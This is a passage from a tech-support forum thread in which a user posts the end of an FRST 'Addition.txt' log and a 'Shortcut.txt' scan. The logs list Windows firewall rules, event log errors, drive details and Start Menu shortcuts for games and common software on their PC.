FirewallRules: [{FA935A1E-26CD-4BE3-9E01-7637EAB7CA2D}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Wolfenstein.The.New.Order\WolfNewOrder_x64.exe
FirewallRules: [{BDAA4673-2E10-40FE-87E1-C1929C642E53}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Wolfenstein.The.New.Order\WolfNewOrder_x64.exe
FirewallRules: [{0D762826-EB6E-4BAB-A137-4BB64D8AC037}] => (Allow) F:\Program Files (x86)\Crazybump\CrazyBump.exe
FirewallRules: [{46CAFC6B-5452-457F-97C0-20A51DEA6D5D}] => (Allow) F:\Program Files (x86)\Crazybump\CrazyBump.exe
FirewallRules: [TCP Query User{90E26D47-2E43-4E54-A6D4-3A76586E344D}F:\games\sniper elite 4\bin\sniperelite4_dedicated.exe] => (Allow) F:\games\sniper elite 4\bin\sniperelite4_dedicated.exe
FirewallRules: [UDP Query User{252B8B23-9510-4871-A844-3A19AE106DF6}F:\games\sniper elite 4\bin\sniperelite4_dedicated.exe] => (Allow) F:\games\sniper elite 4\bin\sniperelite4_dedicated.exe
FirewallRules: [TCP Query User{6585F36D-A1DB-402C-AD6C-2DD1C70A0DEE}F:\download games\xcom 2\binaries\win64\xcom2.exe] => (Block) F:\download games\xcom 2\binaries\win64\xcom2.exe
FirewallRules: [UDP Query User{AE19993A-43FC-4B98-8FD7-4EED28FEA695}F:\download games\xcom 2\binaries\win64\xcom2.exe] => (Block) F:\download games\xcom 2\binaries\win64\xcom2.exe
FirewallRules: [{7C7AE1ED-6DED-43B2-9210-4593DB9B3F34}] => (Allow) C:\Program Files\Opera\49.0.2725.47\opera.exe
FirewallRules: [{AEBE5C5B-CF09-4386-B65F-02254B8DB946}] => (Allow) F:\Games\SteamLibrary\steamapps\common\DARK SOULS III\Game\DarkSoulsIII.exe
FirewallRules: [{56E39D01-EDDE-4406-A7DA-99FADF606713}] => (Allow) F:\Games\SteamLibrary\steamapps\common\DARK SOULS III\Game\DarkSoulsIII.exe
FirewallRules: [{F210BAA1-2177-4CCA-91C6-46693421F1E8}] => (Allow) F:\Games\SteamLibrary\steamapps\common\XCom-Enemy-Unknown\Binaries\Win32\XComGame.exe
FirewallRules: [{2F6F4304-14A5-4857-B21F-2A0CEC4E405C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\XCom-Enemy-Unknown\Binaries\Win32\XComGame.exe
FirewallRules: [{7E4EE891-1FB6-4458-9FD8-5EEAB01EF70C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Magic Duels\MagicDuels.exe
FirewallRules: [{AEF2C244-F95D-4781-9618-404F15FEB97F}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Magic Duels\MagicDuels.exe
FirewallRules: [{77FD5D48-4235-4F63-BF2B-B2E641BD6B1A}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Black Squad\binaries\win32\SteamLauncher.exe
FirewallRules: [{3DB3E0F4-B592-4A6E-8E6E-45F3559FB0C3}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Black Squad\binaries\win32\SteamLauncher.exe
FirewallRules: [TCP Query User{253C0839-3630-4446-A13C-BE687D884D03}F:\program files\matlab\r2017a\bin\win64\matlab.exe] => (Block) F:\program files\matlab\r2017a\bin\win64\matlab.exe
FirewallRules: [UDP Query User{7B1C121C-3E09-4A03-B173-198782809DAE}F:\program files\matlab\r2017a\bin\win64\matlab.exe] => (Block) F:\program files\matlab\r2017a\bin\win64\matlab.exe
FirewallRules: [{F96A0828-B26B-4235-9670-F8D65BD5710F}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{1EA35676-AA0F-4F6D-A3F5-7BF8F6214C81}] => (Allow) F:\Program Files (x86)\Origin Games\Spore\Sporebin\SporeApp.exe
FirewallRules: [{C5293452-5544-4B43-B552-028C4CB7A9EC}] => (Allow) F:\Program Files (x86)\Origin Games\Spore\Sporebin\SporeApp.exe
FirewallRules: [{060D3A43-E54C-4A6F-B2F5-69DC96DA17AD}] => (Allow) F:\Program Files (x86)\Origin Games\Plants vs. Zombies\PlantsVsZombies.exe
FirewallRules: [{DAFD2333-B8AC-44F8-98F6-164334978518}] => (Allow) F:\Program Files (x86)\Origin Games\Plants vs. Zombies\PlantsVsZombies.exe
FirewallRules: [TCP Query User{67659BC8-DEDE-46BD-94C7-A4C855E0E896}F:\games\steamlibrary\steamapps\common\pubg_test\tslgame\binaries\win64\tslgame.exe] => (Allow) F:\games\steamlibrary\steamapps\common\pubg_test\tslgame\binaries\win64\tslgame.exe
FirewallRules: [UDP Query User{3BC627BA-D8FA-4156-B684-73B49B0CE6A2}F:\games\steamlibrary\steamapps\common\pubg_test\tslgame\binaries\win64\tslgame.exe] => (Allow) F:\games\steamlibrary\steamapps\common\pubg_test\tslgame\binaries\win64\tslgame.exe
FirewallRules: [{21656332-4E57-421D-B414-595C5A8A7CF8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{877ACAFF-423B-47EC-BC21-676FD68BF04D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{386E7FCD-5E43-4D6E-944A-BA43C5E35E2F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{7363C606-4C7A-46F3-A6E2-F682272E8A09}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [TCP Query User{B9CC892D-CBC7-4491-9501-CD76C028EB70}F:\games\gauntlet\binaries\gauntlet.exe] => (Allow) F:\games\gauntlet\binaries\gauntlet.exe
FirewallRules: [UDP Query User{BF04B010-6EC8-4EF2-8A4D-1ECE6635E18B}F:\games\gauntlet\binaries\gauntlet.exe] => (Allow) F:\games\gauntlet\binaries\gauntlet.exe
FirewallRules: [{E26239D1-663F-4582-9B9B-B9E4A66E44BB}] => (Allow) F:\Games\SteamLibrary\steamapps\common\DarkestDungeon\_windows\Darkest.exe
FirewallRules: [{8EA39488-49CA-402A-A187-2D2BEFB34D12}] => (Allow) F:\Games\SteamLibrary\steamapps\common\DarkestDungeon\_windows\Darkest.exe
FirewallRules: [{89B622F3-3265-4389-AB68-E53E8C449E78}] => (Allow) D:\SteamLibrary HDD\steamapps\common\ARK Survival Evolved Dedicated Server\ShooterGame\Binaries\Win64\ShooterGameServer.exe
FirewallRules: [{C63D1ECD-1104-4A26-84E7-FEF82D309F56}] => (Allow) D:\SteamLibrary HDD\steamapps\common\ARK Survival Evolved Dedicated Server\ShooterGame\Binaries\Win64\ShooterGameServer.exe
FirewallRules: [{735CE4C8-7E10-4E7E-AFDF-B2886CE118A0}] => (Allow) D:\SteamLibrary HDD\steamapps\common\ARK Survival Evolved Dedicated Server\ShooterGame\Binaries\Win64\ShooterGameServer.exe
FirewallRules: [{22AF6734-B619-4EF4-A5F6-B59823F28622}] => (Allow) D:\SteamLibrary HDD\steamapps\common\ARK Survival Evolved Dedicated Server\ShooterGame\Binaries\Win64\ShooterGameServer.exe
FirewallRules: [{4A9A7F62-9BFD-4EF0-AE3A-4C9222C5ECBD}] => (Allow) C:\Program Files\Opera\49.0.2725.64\opera.exe
FirewallRules: [{A63BA824-7742-453D-B20F-E15E1775D444}] => (Allow) F:\Games\SteamLibrary\steamapps\common\insurgency2\insurgency_BE.exe
FirewallRules: [{BD26008E-3FA3-49E2-BD79-944DB4EC4976}] => (Allow) F:\Games\SteamLibrary\steamapps\common\insurgency2\insurgency_BE.exe
FirewallRules: [TCP Query User{71A7F12C-D49A-41FC-A3EA-E43A72876401}F:\games\steamlibrary\steamapps\common\insurgency2\insurgency.exe] => (Allow) F:\games\steamlibrary\steamapps\common\insurgency2\insurgency.exe
FirewallRules: [UDP Query User{C626AB03-E07A-49BE-81BA-27F903FE6D72}F:\games\steamlibrary\steamapps\common\insurgency2\insurgency.exe] => (Allow) F:\games\steamlibrary\steamapps\common\insurgency2\insurgency.exe
FirewallRules: [{478F40C6-B192-4563-8DEF-92BDBC666B49}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Black Squad\binaries\win32\BlackSquadGame.exe
FirewallRules: [{623A403D-8D08-4A3D-AD55-9B543CD1D371}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Black Squad\binaries\win32\BlackSquadGame.exe
FirewallRules: [TCP Query User{81A18AD1-1591-43A5-8B4F-88363EB6DBBB}F:\games\joguinhos merda\vagante b58\vagante\vagante.exe] => (Allow) F:\games\joguinhos merda\vagante b58\vagante\vagante.exe
FirewallRules: [UDP Query User{AB9D8834-7B5B-400E-95CD-BF2C9E25E089}F:\games\joguinhos merda\vagante b58\vagante\vagante.exe] => (Allow) F:\games\joguinhos merda\vagante b58\vagante\vagante.exe
FirewallRules: [{0880EF96-5242-4DD9-8B1D-EEB2B2DAAB0B}] => (Allow) F:\Games\Star Wars-The Old Republic\launcher.exe
FirewallRules: [{943B9236-B3E9-4198-A33C-9B53C4B6B195}] => (Allow) F:\Games\Star Wars-The Old Republic\launcher.exe
FirewallRules: [{50772711-424B-4182-8857-8097573CB779}] => (Allow) F:\Games\Star Wars-The Old Republic\launcher.exe
FirewallRules: [{266882BE-1950-4A64-A45F-D8845763536E}] => (Allow) F:\Games\Star Wars-The Old Republic\launcher.exe
FirewallRules: [{62F8F72A-2CF0-4E56-AAFC-8C8E15E610AA}] => (Allow) F:\Games\SteamLibrary\steamapps\common\AdVenture Capitalist\adventure-capitalist.exe
FirewallRules: [{F3DF8234-AC7F-42DA-9F8A-1837AEB68ED8}] => (Allow) F:\Games\SteamLibrary\steamapps\common\AdVenture Capitalist\adventure-capitalist.exe
FirewallRules: [{71121149-161D-4B53-BB41-8D5385C630AB}] => (Allow) F:\Games\SteamLibrary\steamapps\common\IdleChampions\IdleDragons.exe
FirewallRules: [{D7B418E8-DD7A-43DF-97B2-AFB45DCE4BA5}] => (Allow) F:\Games\SteamLibrary\steamapps\common\IdleChampions\IdleDragons.exe
FirewallRules: [{92E3EA7F-D8AC-464C-84C3-C5EE287B8FA2}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Crusader Kings II\CK2game.exe
FirewallRules: [{8B5E7DC6-2EF7-4F22-860A-057B4BF02011}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Crusader Kings II\CK2game.exe
FirewallRules: [{1BEAC9C1-9AEC-48C3-8459-A2B239E4E17B}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Europa Universalis IV\eu4.exe
FirewallRules: [{BAC4F4D2-2727-43D3-8ACC-5870EC987752}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Europa Universalis IV\eu4.exe

==================== Restore Points =========================

21-12-2017 15:27:46 Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008
21-12-2017 15:28:01 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215
21-12-2017 15:28:12 Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008
21-12-2017 15:28:23 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
28-12-2017 02:36:06 Ponto de verificação por HitmanPro
28-12-2017 02:42:49 Ponto de verificação por HitmanPro

==================== Faulty Device Manager Devices =============

Name: TAP-Windows Adapter V9
Description: TAP-Windows Adapter V9
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: TAP-Windows Provider V9
Service: tap0901
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (12/28/2017 03:34:14 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (12/28/2017 03:22:23 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (12/28/2017 04:09:19 AM) (Source: MsiInstaller) (EventID: 11406) (User: Sblck-PC)
Description: Product: Sophos AutoUpdate -- Error 1406.Could not write value Sophos AutoUpdate Monitor to key \SOFTWARE\Microsoft\Windows\CurrentVersion\Run.  System error .  Verify that you have sufficient access to that key, or contact your support personnel.

Error: (12/28/2017 02:42:57 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x0000021c,SYSTEM\CurrentControlSet\Services\VSS\Diag\VssvcPublisher,0,REG_BINARY,000000000234F140.72).  hr = 0x80070005, Access is denied.
.

Error: (12/28/2017 02:42:57 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000858,(null),0,REG_BINARY,000000000258DDB0.72).  hr = 0x80070005, Access is denied.
.


Operation:
   BackupShutdown Event

Context:
   Execution Context: Writer
   Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
   Writer Name: WMI Writer
   Writer Instance ID: {075b1717-b504-4da1-a1e4-fcc983abe7ec}

Error: (12/28/2017 02:42:57 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000001d0,SYSTEM\CurrentControlSet\Services\VSS\Diag\Registry Writer,0,REG_BINARY,00000000035AEEE0.72).  hr = 0x80070005, Access is denied.
.


Operation:
   BackupShutdown Event

Context:
   Execution Context: Writer
   Writer Class Id: {afbab4a2-367d-4d15-a586-71dbb18f8485}
   Writer Name: Registry Writer
   Writer Instance ID: {d7c9ec6a-cc04-4aab-8077-c74f344303d9}

Error: (12/28/2017 02:42:57 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000210,SYSTEM\CurrentControlSet\Services\VSS\Diag\Shadow Copy Optimization Writer,0,REG_BINARY,000000000352EAB0.72).  hr = 0x80070005, Access is denied.
.


Operation:
   BackupShutdown Event

Context:
   Execution Context: Writer
   Writer Class Id: {4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f}
   Writer Name: Shadow Copy Optimization Writer
   Writer Instance ID: {dc6b6e4e-0397-4007-8b95-903648135756}

Error: (12/28/2017 02:42:57 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000858,(null),0,REG_BINARY,000000000258DDB0.72).  hr = 0x80070005, Access is denied.
.


Operation:
   BackupShutdown Event

Context:
   Execution Context: Writer
   Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
   Writer Name: WMI Writer
   Writer Instance ID: {075b1717-b504-4da1-a1e4-fcc983abe7ec}

Error: (12/28/2017 02:42:57 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000001dc,SYSTEM\CurrentControlSet\Services\VSS\Diag\COM+ REGDB Writer,0,REG_BINARY,0000000001C4EE00.72).  hr = 0x80070005, Access is denied.
.


Operation:
   BackupShutdown Event

Context:
   Execution Context: Writer
   Writer Class Id: {542da469-d3e1-473c-9f4f-7847f01fc64f}
   Writer Name: COM+ REGDB Writer
   Writer Instance ID: {21ad5c2e-d548-4236-8e90-3e5243023075}

Error: (12/28/2017 02:42:57 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000001d0,SYSTEM\CurrentControlSet\Services\VSS\Diag\Registry Writer,0,REG_BINARY,00000000035AEEE0.72).  hr = 0x80070005, Access is denied.
.


Operation:
   BackupShutdown Event

Context:
   Execution Context: Writer
   Writer Class Id: {afbab4a2-367d-4d15-a586-71dbb18f8485}
   Writer Name: Registry Writer
   Writer Instance ID: {d7c9ec6a-cc04-4aab-8077-c74f344303d9}


System errors:
=============
Error: (12/28/2017 03:58:57 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error: 
%%-2140993535

Error: (12/28/2017 03:58:57 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error: 
%%-2140993535

Error: (12/28/2017 03:58:57 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error: 
%%-2140993535

Error: (12/28/2017 03:58:57 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error: 
%%-2140993535

Error: (12/28/2017 03:58:57 PM) (Source: PNRPSvc) (EventID: 102) (User: )
Description: The Peer Name Resolution Protocol cloud did not start because the creation of the default identity failed with error code: 0x80630801.

Error: (12/28/2017 03:58:57 PM) (Source: PNRPSvc) (EventID: 102) (User: )
Description: The Peer Name Resolution Protocol cloud did not start because the creation of the default identity failed with error code: 0x80630801.

Error: (12/28/2017 03:58:46 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error: 
%%-2140993535

Error: (12/28/2017 03:58:46 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error: 
%%-2140993535

Error: (12/28/2017 03:58:46 PM) (Source: PNRPSvc) (EventID: 102) (User: )
Description: The Peer Name Resolution Protocol cloud did not start because the creation of the default identity failed with error code: 0x80630801.

Error: (12/28/2017 03:33:30 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID 
{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}
 and APPID 
{344ED43D-D086-4961-86A6-1106F4ACAD9B}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.


CodeIntegrity:
===================================
  Date: 2017-12-28 02:40:16.109
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\ProgramData\ESET\ESET NOD32 Antivirus\Updfiles\base_nonnups\nod4AB6.dll.nup.raw because the set of per-page image hashes could not be found on the system.

  Date: 2017-12-28 02:40:16.029
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\ProgramData\ESET\ESET NOD32 Antivirus\Updfiles\base_nonnups\nod4AB6.dll.nup.raw because the set of per-page image hashes could not be found on the system.

  Date: 2017-12-28 02:40:15.969
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\ProgramData\ESET\ESET NOD32 Antivirus\Updfiles\base_nonnups\nod4AB6.dll.nup.raw because the set of per-page image hashes could not be found on the system.

  Date: 2017-12-28 02:40:15.889
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\ProgramData\ESET\ESET NOD32 Antivirus\Updfiles\base_nonnups\nod4AB6.dll.nup.raw because the set of per-page image hashes could not be found on the system.

  Date: 2017-12-28 02:40:15.809
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\ProgramData\ESET\ESET NOD32 Antivirus\Updfiles\base_nonnups\nod4AB6.dll.nup.raw because the set of per-page image hashes could not be found on the system.

  Date: 2017-12-28 02:40:15.749
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\ProgramData\ESET\ESET NOD32 Antivirus\Updfiles\base_nonnups\nod4AB6.dll.nup.raw because the set of per-page image hashes could not be found on the system.

  Date: 2017-12-28 02:33:03.729
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\ESET\ESET NOD32 Antivirus\Modules\em023_64\9673\em023_64.dll.raw because the set of per-page image hashes could not be found on the system.

  Date: 2017-12-28 02:33:03.649
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\ESET\ESET NOD32 Antivirus\Modules\em023_64\9673\em023_64.dll.raw because the set of per-page image hashes could not be found on the system.

  Date: 2017-12-28 02:33:03.589
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\ESET\ESET NOD32 Antivirus\Modules\em023_64\9673\em023_64.dll.raw because the set of per-page image hashes could not be found on the system.

  Date: 2017-12-28 02:33:03.518
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\ESET\ESET NOD32 Antivirus\Modules\em023_64\9673\em023_64.dll.raw because the set of per-page image hashes could not be found on the system.


==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i7-2600K CPU @ 3.40GHz
Percentage of memory in use: 14%
Total physical RAM: 24543.14 MB
Available physical RAM: 20908.38 MB
Total Virtual: 24741.32 MB
Available Virtual: 21064.21 MB

==================== Drives ================================

Drive c: (SSD) (Fixed) (Total:232.4 GB) (Free:32.23 GB) NTFS
Drive d: (HDD 500GB) (Fixed) (Total:465.76 GB) (Free:140.99 GB) NTFS
Drive f: (Mass Storage) (Fixed) (Total:1863.01 GB) (Free:354.8 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 9E858FBD)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 991D8B9F)
Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=232.4 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 6D231126)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================


#6 xterz

xterz
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:03:06 AM

Posted 28 December 2017 - 11:25 AM

Following by Shortcut.txt

Users shortcut scan result (x64) Version: 26-12-2017
Ran by Sblck (28-12-2017 16:03:10)
Running from F:\Desktop\DesktopC
Boot Mode: Normal

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)


Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Unigine\Heaven Benchmark 4.0\Heaven Benchmark 4.0.lnk -> F:\Program Files (x86)\Heaven Benchmark 4.0\heaven.bat ()


Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\BlueStacks.lnk -> F:\Program Files (x86)\BlueStacks\BlueStacks\Client\BlueStacks.exe (BlueStack Systems, Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk -> C:\Windows\Installer\{AC76BA86-7AD7-1046-7B44-AC0F074E4100}\SC_Reader.ico (Flexera Software LLC)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2018.lnk -> F:\Program Files\Adobe After Effects CC 2018\Support Files\AfterFX.exe (Adobe Systems Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Systems Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Media Encoder CC 2018.lnk -> F:\Program Files\Adobe Media Encoder CC 2018\Adobe Media Encoder.exe (Adobe)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Audacity.lnk -> C:\Program Files (x86)\Audacity\audacity.exe (The Audacity Team)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LOOT.lnk -> F:\Programs\LOOT\LOOT.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk -> C:\Windows\ehome\ehshell.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera Browser.lnk -> C:\Program Files\Opera\launcher.exe (Opera Software)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client.lnk -> F:\Programs\ts3\ts3client_win64.exe (TeamSpeak Systems GmbH)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 12.lnk -> C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk -> C:\Program Files\DVD Maker\DVDMaker.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk -> C:\Windows\System32\xpsrchvw.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Yet Another (remote) Process Monitor\Help.lnk -> F:\Programs\Yet Another (remote) Process Monitor\Help\help_static.html ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Yet Another (remote) Process Monitor\Start YAPM server.lnk -> F:\Programs\Yet Another (remote) Process Monitor\launch server.bat ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Yet Another (remote) Process Monitor\Uninstall Yet Another (remote) Process Monitor.lnk -> F:\Programs\Yet Another (remote) Process Monitor\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Yet Another (remote) Process Monitor\Yet Another (remote) Process Monitor.lnk -> F:\Programs\Yet Another (remote) Process Monitor\YAPM.exe (v_k softwares)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\Console RAR manual.lnk -> C:\Program Files\WinRAR\Rar.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\What is new in the latest version.lnk -> C:\Program Files\WinRAR\WhatsNew.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR help.lnk -> C:\Program Files\WinRAR\WinRAR.chm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR.lnk -> C:\Program Files\WinRAR\WinRAR.exe (Alexander Roshal)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WB Games\Batman - Arkham Origins\Batman - Arkham Origins.lnk -> F:\Joguinhos Merda\Batman - Arkham Origins\SinglePlayer\Binaries\Win32\BatmanOrigins.exe (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WB Games\Batman - Arkham Origins\Uninstall Batman - Arkham Origins.lnk -> F:\Joguinhos Merda\Batman - Arkham Origins\unins000.exe (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VirusTotal Uploader 2.2\Uninstall.lnk -> F:\Programs\VirusTotalUploader2\uninstall.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VirusTotal Uploader 2.2\VirusTotal Uploader 2.2.lnk -> F:\Programs\VirusTotalUploader2\VirusTotalUploader2.2.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN\Documentation.lnk -> F:\Programs\VLC\Documentation.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN\Release Notes.lnk -> F:\Programs\VLC\NEWS.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN\VideoLAN Website.lnk -> F:\Programs\VLC\VideoLAN Website.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN\VLC media player.lnk -> F:\Programs\VLC\vlc.exe (VideoLAN)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\USBlyzer\Help.lnk -> D:\USBlyzer\USBlyzer.chm (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\USBlyzer\Uninstall.lnk -> D:\USBlyzer\Uninstall.exe (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\USBlyzer\USBlyzer.lnk -> D:\USBlyzer\USBlyzer.exe (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Unigine\Heaven Benchmark 4.0\Uninstall.lnk -> F:\Program Files (x86)\Heaven Benchmark 4.0\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Unigine\Heaven Benchmark 4.0\User manual.lnk -> F:\Program Files (x86)\Heaven Benchmark 4.0\documentation\User_Manual.pdf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tunngle\Tunngle.lnk -> C:\Program Files (x86)\Tunngle\Tunngle.exe (Tunngle.net GmbH)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tunngle\Uninstall Tunngle.lnk -> C:\Program Files (x86)\Tunngle\unins000.exe ()
